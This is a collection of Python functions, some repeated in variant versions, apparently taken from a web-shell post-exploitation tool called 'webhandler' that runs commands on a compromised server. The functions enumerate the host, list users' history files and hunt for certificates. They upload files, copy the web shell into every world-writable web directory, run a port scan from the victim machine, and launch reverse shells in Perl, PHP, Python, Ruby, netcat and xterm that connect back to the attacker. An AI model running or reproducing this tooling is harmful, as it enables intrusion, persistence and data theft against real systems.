def system(self): cmd = 'bash -c "input=\$(uptime); if [[ \$input == *day* ]]; then out=\$(echo \$input | awk \'{print \$3\\" days\\"}\'); if [[ \$input == *min* ]]; then out=\$(echo \\"\$out and \\" && echo \$input | awk \'{print \$5\\" minutes\\"}\'); else out=\$(echo \\"\$out, \\" && echo \$input | awk \'{print \$5}\' | tr -d \\",\\" | awk -F \\":\\" \'{print \$1\\" hours and \\"\$2\\" minutes\\"}\'); fi elif [[ \$input == *min* ]]; then out=\$(echo \$input | awk \'{print \$3\\" minutes\\"}\'); else out=\$(echo \$input | awk \'{print \$3}\' | tr -d \\",\\" | awk -F \\":\\" \'{print \$1\\" hours and \\"\$2\\" minutes\\"}\'); fi; echo \$out;" ;' cmd += "awk '{print ($1/(60*60*24))/($2/(60*60*24))*100 \"%\"}' /proc/uptime;" cmd += "w -h | wc -l;" cmd += "wc -l /etc/passwd | awk '{print $1}';" cmd += "wc -l /etc/group | awk '{print $1}';" cmd += "awk '{print $1 \" \" $2 \" \" $3}' /proc/loadavg;" cmd += "free -m | grep 'buffers/cache' | awk '{print $3*100/($3+$4)}';" cmd += "netstat -tn | grep ESTABLISHED | wc -l | awk '{print $1}';" cmd += "netstat -atn | grep LISTEN | wc -l | awk \"{print $1}\";" cmd += "awk '{split($4,a,\"/\"); print a[1];}' /proc/loadavg;" cmd += "awk '{split($4,a,\"/\"); print a[2];}' /proc/loadavg;" system = make_request.get_page_source(cmd) system = iter(system) output = '\n[+] Uptime: {0}\n'.format(next(system, "Unknown")) output += '[+] Idletime: {0}\n'.format(next(system, "Unknown")) output += '[+] Users Logged in: {0}\n'.format(next(system, "Unknown")) output += '[+] Total Users: {0}\n'.format(next(system, "Unknown")) output += '[+] Total Groups: {0}\n'.format(next(system, "Unknown")) output += '[+] CPU Load (1, 5, 15 mins): {0}\n'.format(next(system, "Unknown")) output += '[+] Memory Load (Used %): {0}\n'.format(next(system, "Unknown")) output += '[+] Established TCP Connections: {0}\n'.format(next(system, "Unknown")) output += '[+] Listening TCP Services: {0}\n'.format(next(system, "Unknown")) output += '[+] User Processors: {0}\n'.format(next(system, "Unknown")) output += '[+] Total Processor: {0}'.format(next(system, "Unknown")) cprint(output, 'green')
def system(self): cmd = 'bash -c "input=\$(uptime); if [[ \$input == *day* ]]; then out=\$(echo \$input | awk \'{print \$3\\" days\\"}\'); if [[ \$input == *min* ]]; then out=\$(echo \\"\$out and \\" && echo \$input | awk \'{print \$5\\" minutes\\"}\'); else out=\$(echo \\"\$out, \\" && echo \$input | awk \'{print \$5}\' | tr -d \\",\\" | awk -F \\":\\" \'{print \$1\\" hours and \\"\$2\\" minutes\\"}\'); fi elif [[ \$input == *min* ]]; then out=\$(echo \$input | awk \'{print \$3\\" minutes\\"}\'); else out=\$(echo \$input | awk \'{print \$3}\' | tr -d \\",\\" | awk -F \\":\\" \'{print \$1\\" hours and \\"\$2\\" minutes\\"}\'); fi; echo \$out;" ;' cmd += "awk '{print ($1/(60*60*24))/($2/(60*60*24))*100 \"%\"}' /proc/uptime;" cmd += "w -h | wc -l;" cmd += "wc -l /etc/passwd | awk '{print $1}';" cmd += "wc -l /etc/group | awk '{print $1}';" cmd += "awk '{print $1 \" \" $2 \" \" $3}' /proc/loadavg;" cmd += "free -m | grep 'buffers/cache' | awk '{print $3*100/($3+$4)}';" cmd += "netstat -tn | grep ESTABLISHED | wc -l | awk '{print $1}';" cmd += "netstat -atn | grep LISTEN | wc -l | awk \"{print $1}\";" cmd += "awk '{split($4,a,\"/\"); print a[1];}' /proc/loadavg;" cmd += "awk '{split($4,a,\"/\"); print a[2];}' /proc/loadavg;" system = make_request.get_page_source(cmd) system = iter(system) output = '\n[+] Uptime: {0}\n'.format(next(system, "Unknown")) output += '[+] Idletime: {0}\n'.format(next(system, "Unknown")) output += '[+] Users Logged in: {0}\n'.format(next(system, "Unknown")) output += '[+] Total Users: {0}\n'.format(next(system, "Unknown")) output += '[+] Total Groups: {0}\n'.format(next(system, "Unknown")) output += '[+] CPU Load (1, 5, 15 mins): {0}\n'.format( next(system, "Unknown")) output += '[+] Memory Load (Used %): {0}\n'.format( next(system, "Unknown")) output += '[+] Established TCP Connections: {0}\n'.format( next(system, "Unknown")) output += '[+] Listening TCP Services: {0}\n'.format( next(system, "Unknown")) output += '[+] User Processors: {0}\n'.format(next(system, "Unknown")) output += '[+] Total Processor: {0}'.format(next(system, "Unknown")) cprint(output, 'green')
def write_file(rfilr_path): "nested function to be used within the file_exists conditions" try: # open the the file in 'r' mode to upload it with open(lfile_path) as local_file: data_to_upload = local_file.read().encode("base64").strip() # split the data then join it to escap special chars and new lines data_to_upload = "".join(data_to_upload.splitlines()) def chuncks(seq, length): "split data into chuncks to avoid Error 414" return [seq[i : i + length] for i in xrange(0, len(seq), length)] if len(data_to_upload) > 300 and make_request.method != "post": for i in chuncks(data_to_upload, 200): # append data to pre-written file using >> data = "echo {0}| base64 -d >> {1}".format(i, rfile_path) make_request.get_page_source(data) else: data = "echo {0}| base64 -d > {1}".format(data_to_upload, rfile_path) make_request.get_page_source(cmd=data) if self.check_fileSum(lfile_path, rfile_path): "if the two files have the same md5sum" print "[+] Successfully uploaded {0} to {1}".format(lfile_path, rfile_path) else: cprint("[!] Something went wrong while uploading the file") # throw an exception when the local file not exists except IOError: cprint('\n[+] File: "{0}" doesn\'t exist'.format(lfile_path), "red")
def upload(self, command): if len(command) != 3: cprint('\n[!] Usage: @upload [local_file_path] [remote_file_path]', 'red') else: lfile_path = command[1] rfile_path = command[2] file_handler.upload_file(lfile_path, rfile_path)
def get_writble_dir(self): cmd = "find {0} -perm -0003 -type d 2>/dev/null | sort -R".format(self.get_doc_root()) # -print -quit result = make_request.get_page_source(cmd) if result: result = result[0] cprint('\n[+] Found a directory to use: \'{0}\''.format(result), 'green') else: cprint('\n[!] Unable to find a suitable directory', 'red') return result
def history(self): cmd = 'for i in $(cut -d: -f6 /etc/passwd | sort | uniq); do [ -f $i/.bash_history ] && echo "bash_history: $i"; [ -f $i/.nano_history ] && echo "nano_history: $i"; [ -f $i/.atftp_history ] && echo "atftp_history: $i"; [ -f $i/.mysql_history ] && echo "mysql_history: $i"; [ -f $i/.php_history ] && echo "php_history: $i";done' history = make_request.get_page_source(cmd) if history: c = 1 for path in history: cprint('{0:2d}.) {1}'.format(c, path), 'green') c += 1 else: cprint('\n[!] Didn\'t find any \'history\' files', 'red')
def alias(self, command): # splitted_command = map(str.strip, command.split('=')) command = " ".join(command[1:]) # print command splitted_command = map(str.strip, command.split('=')) try: self.aliased_commands[splitted_command[0]] = splitted_command[1] except: cprint('\n[!] Usage: :alias command=alias', 'red') cprint('[!] example: :alias ls=\'ls -lh --color\'', 'red')
def history(self): cmd = 'for i in $(cut -d: -f6 /etc/passwd | sort | uniq); do [ -f $i/.bash_history ] && echo "bash_history: $i"; [ -f $i/.nano_history ] && echo "nano_history: $i"; [ -f $i/.atftp_history ] && echo "atftp_history: $i"; [ -f $i/.mysql_history ] && echo "mysql_history: $i"; [ -f $i/.php_history ] && echo "php_history: $i";done' self.history = make_request.get_page_source(cmd) if self.history: c = 1 for path in self.history: cprint('{0:2d}.) {1}'.format(c, path), 'green') c += 1 else: cprint('\n[!] Didn\'t find any \'history\' files', 'red')
def writable(self): cmd = "find {0} -depth -perm -0002 -type d".format(linux.get_doc_root()) self.writable = make_request.get_page_source(cmd) if self.writable: c = 1 for path in self.writable: cprint('{0:2d}.) {1}'.format(c, path), 'green') c += 1 else: cprint('\n[!] Didn\'t find any wriable directories', 'red')
def get_writble_dir(self): cmd = "find {0} -perm -0003 -type d 2>/dev/null | sort -R".format( self.get_doc_root()) # -print -quit result = make_request.get_page_source(cmd) if result: result = result[0] cprint('\n[+] Found a directory to use: \'{0}\''.format(result), 'green') else: cprint('\n[!] Unable to find a suitable directory', 'red') return result
def create_connection(self): try: print banner print colored('\n[i] Connecting to: ', 'green') + colored(str(self.ip), 'yellow') + colored(':', 'green') + colored(str(self.port), 'yellow') self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.socket.connect((self.ip, self.port)) self.socket.setblocking(0) except socket.error: cprint('\n[!] Wasn\'t able to connect to: {0}, on port: {1}.'.format(self.ip, self.port), 'red') exit(3)
def writable(self): cmd = "find {0} -depth -perm -0002 -type d".format( linux.get_doc_root()) self.writable = make_request.get_page_source(cmd) if self.writable: c = 1 for path in self.writable: cprint('{0:2d}.) {1}'.format(c, path), 'green') c += 1 else: cprint('\n[!] Didn\'t find any wriable directories', 'red')
def spread(self): provided_shell_name = raw_input(colored('\n[?] Current shell name: ', 'green')) shell_name = getargs.url.split('/')[-1] if getargs.method == 'post' else provided_shell_name cmd = 'find {0} -depth -perm -0002 -type d | xargs -n 1 cp -v {1}'.format(linux.get_doc_root(), shell_name) done = make_request.get_page_source(cmd) if done: success = '\n[+] {shell_name}{end} already written to {hot}{writable_length} paths'.format( shell_name=shell_name, writable_length=len(done)) success += '\n[+] To check these paths type @enum writable' cprint(success, 'blue') else: cprint('\n[!] Something went wrong while spreading shell', 'red')
def execut(self, sql): cmd = 'echo "%s" > %s/sql.txt' % (sql, self.hostDir) cprint('\n[+] Sending SQL...', 'green') make_request.get_page_source(cmd) cmd2 = 'cd %s; php mysql.php' % self.hostDir res = make_request.get_page_source(cmd2) res = res[0].replace('null', '"null"') try: res = eval(res) d = Tablize(res, sql) d.tablize(d.tup) except: cprint(res, 'red')
def download(self, command): if len(command) not in (2, 3): cprint('\[!] Usage: @download [remote_file_path] <local_file_path>', 'red') else: rfile_path = command[1] if len(command) == 2: lfile_path = '{0}/output/{1}{2}_{3}'.format(getcwd(), info.host_ip, rfile_path, info.session) lfolder = '/'.join(lfile_path.split('/')[:-1]) if not path.exists(lfolder): makedirs(lfolder) else: lfile_path = command[2] file_handler.download_file(rfile_path, lfile_path)
def download_file(self, rfile_path, lfile_path): cmd = "if [ -e {0} ]; then if [ -f {0} ]; then echo file; else echo dir; fi; fi".format(rfile_path) file_type = make_request.get_page_source(cmd) if file_type: file_type = file_type[0] if file_type == "file": cmd = "cat {0}".format(rfile_path) try: with open(lfile_path, "w") as dest_file: dest_file.write("\n".join(make_request.get_page_source(cmd)) + "\n") print '\n[+] Successfully downloaded "{0}" to "{1}"'.format(rfile_path, lfile_path) except IOError, e: cprint("\n[!] Error: {0}".format(e), "red")
def perl(self, ip, port): cmd = "for x in `whereis perl`; do file $x | grep executable | awk '{print $1}' | tr -d ':'; done" perl = make_request.get_page_source(cmd) if perl: cprint('\n[i] Found perl:', 'green') c = 1 for path in perl: cprint('{0:2d}.) {1}'.format(c, path), 'green') c += 1 msg = colored( '\n[i] Make sure: \'{0}\' has a listener shell setup on port: \'{1}\'', 'green') msg += ' (hint: python webhandler.py -l {1} OR nc -lvvp {1})' msg += colored('\n[?] Press <return> when ready!', 'yellow') raw_input(msg.format(ip, port)) for path in perl: cmd = 'nohup {0} -e '.format(path) cmd += '\'use Socket;' cmd += '$i="{0}";'.format(ip) cmd += '$p="{0}";'.format(port) cmd += 'socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));' cmd += 'if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");' cmd += 'open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\' & echo "\n"' make_request.get_page_source(cmd) if self.checkPort(port): break cprint('[+] Done!', 'blue') else: cprint('\n[!] Didn\'t find perl on the remote system', 'red')
def php_cli(self, ip, port): cmd = "for x in `whereis php`; do file $x | grep executable | awk '{print $1}' | tr -d ':'; done" php = make_request.get_page_source(cmd) if php: cprint('\n[i] Found php-cli:', 'green') c = 1 for path in php: cprint('{0:2d}.) {1}'.format(c, path), 'green') c += 1 msg = colored( '\n[i] Make sure: \'{0}\' has a listener shell setup on port: \'{1}\'', 'green') msg += ' (hint: python webhandler.py -l {1} OR nc -lvvp {1})' msg += colored('\n[?] Press <return> when ready!', 'yellow') raw_input(msg.format(ip, port)) for path in php: cmd = 'nohup {0} -r '.format(path) cmd += '\'$sock=fsockopen("{0}",{1});'.format(ip, port) cmd += 'exec("/bin/sh -i <&3 >&3 2>&3");\' &echo "\n"' make_request.get_page_source(cmd) if self.checkPort(port): break cprint('[+] Done!', 'blue') else: cprint('\n[!] Didn\'t find php-cli on the remote system', 'red')
def python(self, ip, port): cmd = "for x in `whereis python`; do file $x | grep executable | awk '{print $1}' | tr -d ':'; done" python = make_request.get_page_source(cmd) if python: cprint('\n[i] Found python:', 'green') c = 1 for path in python: cprint('{0:2d}.) {1}'.format(c, path), 'green') c += 1 msg = colored( '\n[i] Make sure: \'{0}\' has a listener shell setup on port: \'{1}\'', 'green') msg += ' (hint: python webhandler.py -l {1} OR nc -lvvp {1})' msg += colored('\n[?] Press <return> when ready!', 'yellow') raw_input(msg.format(ip, port)) for path in python: cmd = 'nohup {0} -c '.format(path) cmd += '\'import socket,subprocess,os;' cmd += 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);' cmd += 's.connect(("{0}",{1}));'.format(ip, port) cmd += 'os.dup2(s.fileno(),0);' cmd += 'os.dup2(s.fileno(),1);' cmd += 'os.dup2(s.fileno(),2);' cmd += 'p=subprocess.call(["/bin/sh","-i"]);\' &echo "\n"' make_request.get_page_source(cmd) if self.checkPort(port): break cprint('[+] Done!', 'blue') else: cprint('\n[!] Didn\'t find python on the remote system', 'red')
def ruby(self, ip, port): cmd = "for x in `whereis ruby`; do file $x | grep executable | awk '{print $1}' | tr -d ':'; done" ruby = make_request.get_page_source(cmd) if ruby: cprint('\n[i] Found ruby:', 'green') c = 1 for path in ruby: cprint('{0:2d}.) {1}'.format(c, path), 'green') c += 1 msg = colored( '\n[i] Make sure: \'{0}\' has a listener shell setup on port: \'{1}\'', 'green') msg += ' (hint: python webhandler.py -l {1} OR nc -lvvp {1})' msg += colored('\n[?] Press <return> when ready!', 'yellow') raw_input(msg.format(ip, port)) for path in ruby: cmd = 'nohup {0} -rsocket -e'.format(path) cmd += '\'f=TCPSocket.open("{0}",{1}).to_i;'.format(ip, port) cmd += 'exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)\' &echo "\n"' make_request.get_page_source(cmd) if self.checkPort(port): break cprint('[+] Done!', 'blue') else: cprint('\n[!] Didn\'t find ruby on the remote system', 'red')
def perl(self, ip, port): cmd = "for x in `whereis perl`; do file $x | grep executable | awk '{print $1}' | tr -d ':'; done" perl = make_request.get_page_source(cmd) if perl: cprint('\n[i] Found perl:', 'green') c = 1 for path in perl: cprint('{0:2d}.) {1}'.format(c, path), 'green') c += 1 msg = colored('\n[i] Make sure: \'{0}\' has a listener shell setup on port: \'{1}\'', 'green') msg += ' (hint: python webhandler.py -l {1} OR nc -lvvp {1})' msg += colored('\n[?] Press <return> when ready!', 'yellow') raw_input(msg.format(ip, port)) for path in perl: cmd = 'nohup {0} -e '.format(path) cmd += '\'use Socket;' cmd += '$i="{0}";'.format(ip) cmd += '$p="{0}";'.format(port) cmd += 'socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));' cmd += 'if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");' cmd += 'open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\' & echo "\n"' make_request.get_page_source(cmd) if self.checkPort(port): break cprint('[+] Done!', 'blue') else: cprint('\n[!] Didn\'t find perl on the remote system', 'red')
def python(self, ip, port): cmd = "for x in `whereis python`; do file $x | grep executable | awk '{print $1}' | tr -d ':'; done" python = make_request.get_page_source(cmd) if python: cprint('\n[i] Found python:', 'green') c = 1 for path in python: cprint('{0:2d}.) {1}'.format(c, path), 'green') c += 1 msg = colored('\n[i] Make sure: \'{0}\' has a listener shell setup on port: \'{1}\'', 'green') msg += ' (hint: python webhandler.py -l {1} OR nc -lvvp {1})' msg += colored('\n[?] Press <return> when ready!', 'yellow') raw_input(msg.format(ip, port)) for path in python: cmd = 'nohup {0} -c '.format(path) cmd += '\'import socket,subprocess,os;' cmd += 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);' cmd += 's.connect(("{0}",{1}));'.format(ip, port) cmd += 'os.dup2(s.fileno(),0);' cmd += 'os.dup2(s.fileno(),1);' cmd += 'os.dup2(s.fileno(),2);' cmd += 'p=subprocess.call(["/bin/sh","-i"]);\' &echo "\n"' make_request.get_page_source(cmd) if self.checkPort(port): break cprint('[+] Done!', 'blue') else: cprint('\n[!] Didn\'t find python on the remote system', 'red')
def netcat(self, ip, port): ''' nc.OpenBSD deosn't have -e switch. Alternative solution: rm -f /tmp/f && mkfifo /tmp/f && cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT>/tmp/f ''' cmd = "for x in `whereis nc netcat`; do file $x | grep executable | awk '{print $1}' | tr -d ':'; done" netcat = make_request.get_page_source(cmd) if netcat: cprint('\n[i] Found netcat:', 'green') c = 1 for path in netcat: cprint('{0:2d}.) {1}'.format(c, path), 'green') c += 1 msg = colored('\n[i] Make sure: \'{0}\' has a listener shell setup on port: \'{1}\'', 'green') msg += ' (hint: python webhandler.py -l {1} OR nc -lvvp {1})' msg += colored('\n[?] Press <return> when ready!', 'yellow') raw_input(msg.format(ip, port)) for path in netcat: cmd = 'nohup {0} {1} {2} -e /bin/bash &echo "\n"'.format(path, ip, port) make_request.get_page_source(cmd) if self.checkPort(port): break cprint('[+] Done!', 'blue') else: cprint('\n[!] Didn\'t find netcat on the remote system', 'red')
def download_file(self, rfile_path, lfile_path): cmd = 'if [ -e {0} ]; then if [ -f {0} ]; then echo file; else echo dir; fi; fi'.format(rfile_path) file_type = make_request.get_page_source(cmd) if file_type: file_type = file_type[0] if file_type == 'file': cmd = 'cat {0}'.format(rfile_path) try: with open(lfile_path, 'w') as dest_file: dest_file.write('\n'.join(make_request.get_page_source(cmd)) + '\n') print '\n[+] Successfully downloaded "{0}" to "{1}"'.format(rfile_path, lfile_path) except IOError, e: cprint('\n[!] Error: {0}'.format(e), 'red')
def netcat(self, ip, port): ''' nc.OpenBSD deosn't have -e switch. Alternative solution: rm -f /tmp/f && mkfifo /tmp/f && cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT>/tmp/f ''' cmd = "for x in `whereis nc netcat`; do file $x | grep executable | awk '{print $1}' | tr -d ':'; done" netcat = make_request.get_page_source(cmd) if netcat: cprint('\n[i] Found netcat:', 'green') c = 1 for path in netcat: cprint('{0:2d}.) {1}'.format(c, path), 'green') c += 1 msg = colored( '\n[i] Make sure: \'{0}\' has a listener shell setup on port: \'{1}\'', 'green') msg += ' (hint: python webhandler.py -l {1} OR nc -lvvp {1})' msg += colored('\n[?] Press <return> when ready!', 'yellow') raw_input(msg.format(ip, port)) for path in netcat: cmd = 'nohup {0} {1} {2} -e /bin/bash &echo "\n"'.format( path, ip, port) make_request.get_page_source(cmd) if self.checkPort(port): break cprint('[+] Done!', 'blue') else: cprint('\n[!] Didn\'t find netcat on the remote system', 'red')
def create_connection(self): try: print banner print colored('\n[i] Connecting to: ', 'green') + colored( str(self.ip), 'yellow') + colored(':', 'green') + colored( str(self.port), 'yellow') self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.socket.connect((self.ip, self.port)) self.socket.setblocking(0) except socket.error: cprint( '\n[!] Wasn\'t able to connect to: {0}, on port: {1}.'.format( self.ip, self.port), 'red') exit(3)
def download(self, command): if len(command) not in (2, 3): cprint( '\[!] Usage: @download [remote_file_path] <local_file_path>', 'red') else: rfile_path = command[1] if len(command) == 2: lfile_path = '{0}/output/{1}{2}_{3}'.format( getcwd(), info.host_ip, rfile_path, info.session) lfolder = '/'.join(lfile_path.split('/')[:-1]) if not path.exists(lfolder): makedirs(lfolder) else: lfile_path = command[2] file_handler.download_file(rfile_path, lfile_path)
def write_file(rfile_path): "nested function to be used within the file_exists conditions" try: # open the the file in 'r' mode to upload it with open(lfile_path) as local_file: data_to_upload = local_file.read().encode('base64').strip() #split the data then join it to escap special chars and new lines data_to_upload = ''.join(data_to_upload.splitlines()) def chuncks(seq, length): "split data into chuncks to avoid Error 414" return [ seq[i:i + length] for i in xrange(0, len(seq), length) ] if len(data_to_upload) > 300 and make_request.method != 'post': chuncked_data = chuncks(data_to_upload, 4000) cprint('\n[!] Uploading %s...' % lfile_path, 'green') cprint( '[!] The amount of data being uploaded is big, I will chunck it into %d stages.' % len(chuncked_data), 'green') for i in tqdm(range(len(chuncked_data))): # append data to pre-written file using >> data = 'echo {0}| base64 -d >> {1}'.format( chuncked_data[i], rfile_path) make_request.get_page_source(data) else: data = 'echo {0}| base64 -d > {1}'.format( data_to_upload, rfile_path) make_request.get_page_source(cmd=data) if self.check_fileSum(lfile_path, rfile_path): "if the two files have the same md5sum" cprint( '[+] Successfully uploaded {0} to {1}'.format( lfile_path, rfile_path), 'green') else: cprint( '\n[!] Something went wrong while uploading the file, md5 checksum failed.', 'red') choice = raw_input('[+] Should I keep going? (y/n): [y] ') if choice.lower() == 'n': self.clean(rfile_path) # throw an exception when the local file not exists except IOError: cprint('\n[+] File: "{0}" doesn\'t exist'.format(lfile_path), 'red')
def ip(self): cmd = "ip addr show | grep inet | awk '{printf \", \" $2}' | sed 's/^, *//' && echo;" cmd += "curl http://ifconfig.me/ip;" cmd += "cat /etc/resolv.conf | grep nameserver | awk '{printf \", \" $2}' | sed 's/^, *//' && echo;" cmd += "/sbin/route -n | awk '{print $2}' | grep -v 0.0.0.0 | grep -v IP | grep -v Gateway | head -n 1;" #grep -q "BOOTPROTO=dhcp" /etc/sysconfig/network-scripts/ifcfg-eth0 2>/dev/null #grep -q "inet dhcp" /etc/network/interfaces 2>/dev/null cmd += 'dhcp_ip=`grep dhcp-server /var/lib/dhcp*/dhclient.* 2>/dev/null | uniq | awk \'{print $4}\' | tr -d ";"`; if [ $dhcp_ip ] ; then echo "Yes ($dhcp_ip)"; else echo "No"; fi;' ip = make_request.get_page_source(cmd) output = '\n[+] Internal IP/subnet: {0}\n'.format(ip[0]) output += '[+] External IP: {0}\n'.format(ip[1]) output += '[+] DNS: {0}\n'.format(ip[2]) output += '[+] Gateway: {0}\n'.format(ip[3]) output += '[+] DHCP?: {0}'.format(ip[4]) cprint(output, 'green')
def ip(self): cmd = "ip addr show | grep inet | awk '{printf \", \" $2}' | sed 's/^, *//' && echo;" cmd += "curl icanhazip.com;" cmd += "cat /etc/resolv.conf | grep nameserver | awk '{printf \", \" $2}' | sed 's/^, *//' && echo;" cmd += "/sbin/route -n | awk '{print $2}' | grep -v 0.0.0.0 | grep -v IP | grep -v Gateway | head -n 1;" #grep -q "BOOTPROTO=dhcp" /etc/sysconfig/network-scripts/ifcfg-eth0 2>/dev/null #grep -q "inet dhcp" /etc/network/interfaces 2>/dev/null cmd += 'dhcp_ip=`grep dhcp-server /var/lib/dhcp*/dhclient.* 2>/dev/null | uniq | awk \'{print $4}\' | tr -d ";"`; if [ $dhcp_ip ] ; then echo "Yes ($dhcp_ip)"; else echo "No"; fi;' ip = make_request.get_page_source(cmd) ip = iter(ip) output = '\n[+] Internal IP/subnet: {0}\n'.format(next(ip, "Unknown")) output += '[+] External IP: {0}\n'.format(next(ip, "Unknown")) output += '[+] DNS: {0}\n'.format(next(ip, "Unknown")) output += '[+] Gateway: {0}\n'.format(next(ip, "Unknown")) output += '[+] DHCP?: {0}'.format(next(ip, "Unknown")) cprint(output, 'green')
def keys(self): cmd = "find / -type f -print0 | xargs -0 -I '{}' bash -c 'openssl x509 -in {} -noout > /dev/null 2>&1; [[ $? == '0' ]] && echo \"{}\"'" self.ssl = make_request.get_page_source(cmd) if self.ssl: c = 1 for path in self.ssl: print '{0:2d}.) {1}'.format(c, path) c += 1 else: cprint('\n[!] Didn\'t find any SSL certs', 'red') cmd = "find / -type f -print0 | xargs -0 -I '{}' bash -c 'openssl x509 -in {} -noout > /dev/null 2>&1; [[ $? == '0' ]] && echo \"{}\"'" self.sshpub = make_request.get_page_source(cmd) if self.sshpub: c = 1 for path in self.sshpub: print '{0:2d}.) {1}'.format(c, path) c += 1 else: cprint('\n[!] Didn\'t find any public SSH keys', 'red')
def os(self): cmd = "hostname;" cmd += "uname -a;" #cmd += "grep DISTRIB_DESCRIPTION /etc/*-release | head -n 1;" cmd += "cat /etc/*-release | head -n 1 | sed 's/DISTRIB_ID=//';" cmd += "date;" cmd += "zdump UTC | sed 's/UTC //';" #cmd += "python -c 'import locale; print locale.getdefaultlocale()[0];';" cmd += "echo $LANG;" os = make_request.get_page_source(cmd) output = '\n[+] Hostname: {0}\n'.format(os[0]) output += '[+] Kernel: {0}\n'.format(os[1]) output += '[+] OS: {0}\n'.format(os[2]) output += '[+] Local Time: {0}\n'.format(os[3]) output += '[+] Timezone (UTC): {0}\n'.format(os[4]) output += '[+] Language: {0}'.format(os[5]) cprint(output, 'green')
def os(self): cmd = "hostname;" cmd += "uname -a;" #cmd += "grep DISTRIB_DESCRIPTION /etc/*-release | head -n 1;" cmd += "cat /etc/*-release | head -n 1 | sed 's/DISTRIB_ID=//';" cmd += "date;" cmd += "zdump UTC | sed 's/UTC //';" #cmd += "python -c 'import locale; print locale.getdefaultlocale()[0];';" cmd += "echo $LANG;" os = make_request.get_page_source(cmd) os = iter(os) output = '\n[+] Hostname: {0}\n'.format(next(os, "Unknown")) output += '[+] Kernel: {0}\n'.format(next(os, "Unknown")) output += '[+] OS: {0}\n'.format(next(os, "Unknown")) output += '[+] Local Time: {0}\n'.format(next(os, "Unknown")) output += '[+] Timezone (UTC): {0}\n'.format(next(os, "Unknown")) output += '[+] Language: {0}'.format(next(os, "Unknown")) cprint(output, 'green')
def scan_host(self, host, range): folder = linux.get_writble_dir() if folder: cprint('[+] Uploading scanner to the box ...', 'green') scanner = folder + '/webhandler_scanner.php' file_handler.upload_file('modules/scanners/port.php', scanner) cmd = 'cd {0}; php {1} {2} {3}'.format(folder, scanner, host, range) cprint('\n[+] Scanning the target ...', 'green') cprint('----------------------------') try: output = make_request.get_page_source(cmd) if output: print "" for line in output: cprint(line, 'white') else: cprint('\n[+] Didn\'t find any open ports match the range "{0}"'.format(range), 'red') file_handler.clean(scanner) except KeyboardInterrupt: file_handler.clean(scanner)
def scan_host(self, host, range): folder = linux.get_writble_dir() if folder: cprint('[+] Uploading scanner to the box ...', 'green') scanner = folder + '/webhandler_scanner.php' file_handler.upload_file('modules/scanners/port.php', scanner) cmd = 'cd {0}; php {1} {2} {3}'.format(folder, scanner, host, range) cprint('\n[+] Scanning the target ...', 'green') cprint('----------------------------') try: output = make_request.get_page_source(cmd) if output: print "" for line in output: cprint(line, 'white') else: cprint( '\n[+] Didn\'t find any open ports match the range "{0}"' .format(range), 'red') file_handler.clean(scanner) except KeyboardInterrupt: file_handler.clean(scanner)
def write_file(rfilr_path): "nested function to be used within the file_exists conditions" try: # open the the file in 'r' mode to upload it with open(lfile_path) as local_file: data_to_upload = local_file.read().encode('base64').strip() #split the data then join it to escap special chars and new lines data_to_upload = ''.join(data_to_upload.splitlines()) def chuncks(seq, length): "split data into chuncks to avoid Error 414" return [ seq[i:i + length] for i in xrange(0, len(seq), length) ] if len(data_to_upload) > 300 and make_request.method != 'post': for i in chuncks(data_to_upload, 200): # append data to pre-written file using >> data = 'echo {0}| base64 -d >> {1}'.format( i, rfile_path) make_request.get_page_source(data) else: data = 'echo {0}| base64 -d > {1}'.format( data_to_upload, rfile_path) make_request.get_page_source(cmd=data) if self.check_fileSum(lfile_path, rfile_path): "if the two files have the same md5sum" print '[+] Successfully uploaded {0} to {1}'.format( lfile_path, rfile_path) else: cprint('[!] Something went wrong while uploading the file') # throw an exception when the local file not exists except IOError: cprint('\n[+] File: "{0}" doesn\'t exist'.format(lfile_path), 'red')
def write_file(rfile_path): "nested function to be used within the file_exists conditions" try: # open the the file in 'r' mode to upload it with open(lfile_path) as local_file: data_to_upload = local_file.read().encode('base64').strip() #split the data then join it to escap special chars and new lines data_to_upload = ''.join(data_to_upload.splitlines()) def chuncks(seq, length): "split data into chuncks to avoid Error 414" return [seq[i:i + length] for i in xrange(0, len(seq), length)] if len(data_to_upload) > 300 and make_request.method != 'post': chuncked_data = chuncks(data_to_upload, 4000) cprint('\n[!] Uploading %s...' % lfile_path, 'green') cprint('[!] The amount of data being uploaded is big, I will chunck it into %d stages.' % len(chuncked_data), 'green') for i in tqdm(range(len(chuncked_data))): # append data to pre-written file using >> data = 'echo {0}| base64 -d >> {1}'.format(chuncked_data[i], rfile_path) make_request.get_page_source(data) else: data = 'echo {0}| base64 -d > {1}'.format(data_to_upload, rfile_path) make_request.get_page_source(cmd=data) if self.check_fileSum(lfile_path, rfile_path): "if the two files have the same md5sum" cprint('[+] Successfully uploaded {0} to {1}'.format(lfile_path, rfile_path), 'green') else: cprint('\n[!] Something went wrong while uploading the file, md5 checksum failed.', 'red') choice = raw_input('[+] Should I keep going? (y/n): [y] ') if choice.lower() == 'n': self.clean(rfile_path) # throw an exception when the local file not exists except IOError: cprint('\n[+] File: "{0}" doesn\'t exist'.format(lfile_path), 'red')
def xterm(self, ip, port): cmd = "for x in `whereis xterm`; do file $x | grep executable | awk '{print $1}' | tr -d ':'; done" xterm = make_request.get_page_source(cmd) if xterm: cprint('\n[i] Found xterm:', 'green') c = 1 for path in xterm: cprint('{0:2d}.) {1}'.format(c, path), 'green') c += 1 #raw_input('\n{0}[i] Make sure: \'{1}\' has a listener shell setup on port: \'{2}\'{4} (hint: python webhandler.py -l {2} OR nc -lvvp {2})\n{3}[?] Press <return> when ready!{4}'.format(Colors.GREEN, ip, port, Colors.YELLOW, Colors.END)) for path in xterm: cmd = 'nohup {0} xterm -display {1}:1 &'.format(path, ip) make_request.get_page_source(cmd) if self.checkPort(port): break cprint('[+] Done!', 'blue') else: cprint('\n[!] Didn\'t find xterm on the remote system', 'red')
